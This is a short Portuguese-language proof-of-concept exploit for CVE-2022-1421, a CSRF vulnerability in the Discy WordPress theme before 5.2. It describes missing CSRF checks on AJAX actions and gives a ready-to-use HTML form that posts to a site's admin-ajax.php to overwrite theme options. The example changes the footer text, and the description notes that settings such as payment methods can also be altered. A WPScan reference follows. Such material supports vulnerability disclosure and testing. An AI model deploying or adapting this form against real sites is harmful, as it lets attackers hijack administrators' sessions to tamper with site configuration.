
Exploit de prova de conceito para CVE-2022-1421, uma vulnerabilidade CSRF no tema Discy WordPress que permite modificação das configurações de administrador através de requisições AJAX maliciosas.
Uma Prova de Conceito para CVE-2022-1421
Discy < 5.2 não tem verificações CSRF em algumas ações AJAX, permitindo que um atacante faça um administrador logado alterar configurações arbitrárias do plugin, incluindo métodos de pagamento, através de um ataque CSRF.
Discy < 5.2
<html>
<body>
<form action="https://target.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="discy_update_options">
<input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
<input type="submit" value="Submit request">
</form>
</body>
</html>
https://wpscan.com/vulnerability/a7a24e8e-9056-4967-bcad-b96cc0c5b249